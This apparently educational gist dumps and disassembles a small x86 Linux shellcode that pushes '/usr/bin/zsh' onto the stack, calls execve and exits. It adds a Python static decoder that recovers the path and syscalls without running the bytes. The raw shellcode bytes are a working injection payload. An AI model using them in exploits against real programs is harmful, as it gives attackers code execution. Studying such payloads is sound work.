Last active March 3, 2016 10:57
Shell code used in https://www.youtube.com/watch?v=1S0aBV-Waeo
[5.0.7]anton@balder:~> od -t x1 shell_code
0000000 31 c0 83 ec 01 88 04 24 68 2f 7a 73 68 68 2f 62
0000020 69 6e 68 2f 75 73 72 89 e6 50 56 b0 0b 89 f3 89
0000040 e1 31 d2 cd 80 b0 01 31 db cd 80
0000053
[5.0.7]anton@balder:~> objdump -D -Mintel,i386 -b binary -m i386 shell_code

shell_code:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   31 c0                   xor    eax,eax
   2:   83 ec 01                sub    esp,0x1
   5:   88 04 24                mov    BYTE PTR [esp],al        ; push string null terminator
   8:   68 2f 7a 73 68          push   0x68737a2f
   d:   68 2f 62 69 6e          push   0x6e69622f
  12:   68 2f 75 73 72          push   0x7273752f               ; push /usr/bin/zsh
  17:   89 e6                   mov    esi,esp
  19:   50                      push   eax                      ; push 0x00 (NULL terminator of execve() argument 'argv')
  1a:   56                      push   esi                      ; push pointer to path string (argv[0])
  1b:   b0 0b                   mov    al,0xb                   ; eax <- syscall 0xb: execve()
  1d:   89 f3                   mov    ebx,esi
  1f:   89 e1                   mov    ecx,esp
  21:   31 d2                   xor    edx,edx
  23:   cd 80                   int    0x80                     ; execve("/usr/bin/zsh", {"/usr/bin/zsh", NULL}, NULL)
  25:   b0 01                   mov    al,0x1                   ; eax <- syscall 0x1: exit()
  27:   31 db                   xor    ebx,ebx                  ; exit status code = 0
  29:   cd 80                   int    0x80                     ; exit(0)

# resources:
# https://stackoverflow.com/questions/1737095/how-do-i-disassemble-raw-x86-code/34424146#34424146
# http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html
# http://www.eecg.toronto.edu/~amza/www.mindsec.com/files/x86regs.html
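As an added example (not part of the gist), a small Python decoder that recovers, without executing the blob, the two things an analyst wants from a listing like the one above: the path assembled on the stack by the run of push imm32 instructions and the syscalls reached through int 0x80. It handles only the opcode forms this blob uses and raises on anything else; SHELL_CODE is re-typed from the od dump, and the syscall-number table is limited to the two numbers used here.

```python
# Sample input: the 43 bytes from the od dump, re-typed here as a constant.
SHELL_CODE = bytes.fromhex(
    "31c083ec01880424682f7a7368682f62696e682f757372"
    "89e65056b00b89f389e131d2cd80b00131dbcd80"
)

LINUX_I386_SYSCALLS = {1: "exit", 11: "execve"}  # only the numbers this blob uses


def modrm_len(code, i):
    """Bytes consumed by a ModR/M operand (plus SIB/displacement) at code[i]."""
    mod, rm = code[i] >> 6, code[i] & 7
    n = 1
    if mod == 3:                      # register-direct: ModR/M byte only
        return n
    if rm == 4:                       # SIB byte present
        n += 1
        if mod == 0 and code[i + 1] & 7 == 5:
            n += 4                    # SIB base=101 with mod=0 means disp32, no base
    elif mod == 0 and rm == 5:
        n += 4                        # disp32 absolute
    if mod == 1:
        n += 1                        # disp8
    elif mod == 2:
        n += 4                        # disp32
    return n


def analyze(code):
    """Linear sweep over the opcodes this blob uses. Tracks AL (the syscall
    number) and the immediates pushed, returning the string they spell and
    the syscalls reached via int 0x80."""
    i, al, pushes, syscalls = 0, None, [], []
    while i < len(code):
        op = code[i]
        if op == 0x68:                                # push imm32
            pushes.append(code[i + 1:i + 5]); i += 5
        elif op == 0x31 and code[i + 1] >> 6 == 3:    # xor reg,reg
            if code[i + 1] & 0x3F == 0:               # xor eax,eax zeroes AL too
                al = 0
            i += 2
        elif 0xB0 <= op <= 0xB7:                      # mov r8,imm8 (B0 = AL)
            if op == 0xB0:
                al = code[i + 1]
            i += 2
        elif op == 0xCD:                              # int imm8
            if code[i + 1] == 0x80:
                syscalls.append(LINUX_I386_SYSCALLS.get(al, f"nr {al}"))
            i += 2
        elif op in (0x83, 0x88, 0x89):                # sub r/m32,imm8 ; mov r/m8,r8 ; mov r/m32,r32
            i += 1 + modrm_len(code, i + 1) + (1 if op == 0x83 else 0)
        elif 0x50 <= op <= 0x57:                      # push r32
            i += 1
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at offset {i:#x}")
    # The last push lands lowest in memory, so the string reads in reverse push order.
    stack_string = b"".join(reversed(pushes)).rstrip(b"\0").decode("ascii", "replace")
    return {"stack_string": stack_string, "syscalls": syscalls}
```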